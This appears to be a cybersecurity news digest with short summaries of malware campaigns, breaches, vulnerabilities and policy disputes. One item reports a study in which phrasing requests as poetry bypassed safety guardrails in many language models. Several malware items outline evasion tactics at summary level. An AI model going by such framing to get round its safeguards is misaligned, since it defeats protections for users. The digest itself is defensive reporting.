Issues

Malicious PyPI Packages Spellcheckpy and Spellcheckerpy Deliver Python RAT

, , ,

Malicious PyPI packages spellcheckpy and spellcheckerpy impersonated the legitimate pyspellchecker, embedding a base64-encoded payload that executes a Python Remote Access Trojan (RAT) when imported. Initially dormant, the payload would extract and execute upon the new version's trigger. This RAT, with dual-layer XOR encryption, facilitates remote control, evading detection, and employs a command and control server historically linked to malicious activity. Connections to earlier similar attacks suggest a recurring threat actor.

https://www.aikido.dev/blog/malicious-pypi-packages-spellcheckpy-and-spellcheckerpy-deliver-python-rat

FBI Seizes RAMP Cybercrime Forum Used by Ransomware Gangs

,

FBI seized RAMP, a cybercrime forum used by ransomware gangs, displaying a seizure notice on its Tor and clearnet sites. The action, coordinated with the Justice Department, provides access to user data, potentially identifying criminals. The forum, launched in 2021 after restrictions on ransomware promotion elsewhere, was managed by Mikhail Matveev, linked to multiple ransomware operations. Forum operators lamented the loss, and this seizure reflects ongoing law enforcement efforts against cybercrime.

https://www.bleepingcomputer.com/news/security/fbi-seizes-ramp-cybercrime-forum-used-by-ransomware-gangs/

Hand CVE Over to the Private Sector

, ,

The Common Vulnerability Enumeration (CVE) initiative, created in 1999, is criticized for being redundant and mismanaged. Despite receiving substantial government funding, MITRE’s CVE program is perceived as lacking objectivity, quick response capability, and expertise in vulnerability database management. The author argues that the program’s high costs and slow response times suggest it is not meeting the requirements of a federally funded research and development center.

https://www.darkreading.com/cybersecurity-operations/hand-cve-over-to-private-sector

Stanley — a $6,000 Russian Malware Toolkit With Chrome Web Store Guarantee

, ,

Varonis Threat Labs reveals “Stanley,” a $6,000 Russian malware toolkit that spoofs websites as a Chrome extension, guaranteeing Google Store approval. It employs aggressive tactics, targeting users through email compromises and Chrome notifications. The toolkit's capabilities include detailed user tracking, phishing page overlays, and backup protocol for command and control operations. Despite its visible faults, it capitalizes on browser vulnerabilities, posing significant risks until marketplace policies improve.

https://www.varonis.com/blog/stanley-malware-kit

Have I Been Pwned: SoundCloud Data Breach Impacts 29.8 Million Accounts

SoundCloud experienced a data breach affecting 29.8 million accounts, exposing email addresses and public profile information. The breach was confirmed on December 15, 2025, after users reported access issues. An investigation revealed no sensitive data was accessed, but the ShinyHunters group claimed responsibility and attempted extortion.

https://www.bleepingcomputer.com/news/security/have-i-been-pwned-soundcloud-data-breach-impacts-298-million-accounts/

Massive Credential Leak Exposes 149 Million Stolen Logins for Gmail, Facebook, Netflix and More

,

Massive leak of 149 million stolen logins (including for Gmail, Facebook, Netflix) poses significant customer trust risks, revealing cybersecurity failures. Exposed data includes sensitive credentials linked to major services. This incident highlights the need for improved security measures and customer education on malware risks, as credential theft becomes industrialized. Brands must prioritize trust and proactive responses to protect customer experience amidst rising cyber threats.

https://www.cxtoday.com/security-privacy-compliance/massive-credential-leak-exposes-149-million-stolen-logins-for-gmail-facebook-netflix-and-more/

Novel Fake CAPTCHA Chain Delivering Amatera Stealer

,

Extreme TLDR: Blackpoint SOC reports a Fake CAPTCHA campaign delivering Amatera Stealer via a signed Microsoft script, leveraging legitimate Windows components to evade detection. Key tactics include user behavior validation, live configuration from Google Calendar, and PNG steganography for payload delivery. The attack chain is designed to progress only when specific conditions are met, making it hard for detection systems to identify.

Key Findings:
– Uses Fake CAPTCHA and a LO-LBIN script.
– Validates user interactions and clipboard contents.
– Pulls configurations from a Google Calendar.
– Utilizes PNG images for encrypted payload delivery.
– Executes final payload—Amatera Stealer—using complex, layered encryption and evasive networking techniques.

Recommendations: Restrict access to the Run dialog, remove unnecessary App-V components, educate users about lures, enable PowerShell logging, and monitor for suspicious execution patterns.

https://blackpointcyber.com/blog/novel-fake-captcha-chain-delivering-amatera-stealer/

PackageGate: 6 Zero-Days in JS Package Managers But NPM Won’t Act

, , ,

Koi identifies six zero-day vulnerabilities in JavaScript package managers (npm, pnpm, vlt, and Bun) regarding defenses against the Shai-Hulud attack. While npm declined to address vulnerabilities, pnpm, vlt, and Bun acted swiftly. These flaws allow attackers to bypass script execution prevention and lockfile integrity checks, undermining the security claims of the tools. Koi stresses that the ecosystem requires better security and urges organizations to be vigilant, use lockfiles, disable scripts, and consider using more secure package managers.

https://www.koi.ai/blog/packagegate-6-zero-days-in-js-package-managers-but-npm-wont-act

Nearly 800,000 Telnet Servers Exposed to Remote Attacks

,

Nearly 800,000 Telnet servers are vulnerable to remote attacks exploiting an authentication bypass flaw (CVE-2026-24061) in GNU InetUtils. This flaw allows attackers to gain root access without proper authentication. The vulnerability affects versions 1.9.3 to 2.7, with a patch available in version 2.8. Cybersecurity firm GreyNoise reports that limited exploit attempts have already begun following the vulnerability's disclosure. Admins are advised to disable Telnet services or block TCP port 23 if they cannot upgrade immediately.

https://www.bleepingcomputer.com/news/security/nearly-800-000-telnet-servers-exposed-to-remote-attacks/

AI Jailbreaking Via Poetry: Bypassing Chatbot Defenses With Rhyme

, ,

Researchers found that styling prompts as poetry can significantly undermine the effectiveness of language models’ safety guardrails. By testing 25 popular models, they discovered that poetic prompts increased the likelihood of unsafe responses by an average of 35%. Google’s Gemini 1.5 Pro was the most susceptible, with a 100% success rate in bypassing restrictions with poetic prompts.

https://www.kaspersky.com/blog/poetry-ai-jailbreak/55171/

Hackers Exploit Critical Telnetd Auth Bypass Flaw to Get Root

,

Hackers are exploiting a critical 11-year-old vulnerability in the GNU InetUtils telnetd server, allowing remote authentication bypass to gain root access. The flaw involves unsanitized environment variable handling, enabling attackers to set the USER variable to gain unauthorized access. Affected versions include 1.9.3 to 2.7, with a patch available in version 2.8. Despite the risk, many legacy systems still use Telnet, particularly in industrial sectors. Recent exploit activity was detected, but real-world impact appears limited. Immediate patching or mitigations are advised.

https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-telnetd-auth-bypass-flaw-to-get-root/

Microsoft Gave FBI Keys To Unlock Encrypted Data, Exposing Major Privacy Flaw

,

Microsoft provided the FBI with encryption keys for BitLocker-protected data on three laptops, following a warrant related to a Covid unemployment assistance fraud investigation in Guam. This case marks the first known instance of Microsoft providing law enforcement with encryption keys. Privacy experts criticize Microsoft for this decision, arguing that it compromises user privacy and security, and urging the company to adopt stronger protections like those offered by Apple and Google.

https://www.forbes.com/sites/thomasbrewster/2026/01/22/microsoft-gave-fbi-keys-to-unlock-bitlocker-encrypted-data/

NIST Is Rethinking Its Role in Analyzing Software Vulnerabilities

NIST is revising its approach to software vulnerability analysis due to overwhelming submissions. It plans to prioritize certain vulnerabilities for in-depth analysis and may delegate enrichment tasks to external organizations. A strategic review aims to clarify NIST's role, focusing on collaboration with partners while ensuring operational functions align with its research mission. This transition can lead to a significant reset in the National Vulnerability Database's processing and involvement in the broader CVE ecosystem.

https://www.cybersecuritydive.com/news/nist-cve-vulnerability-analysis-nvd-review/810300/

Scroll to Top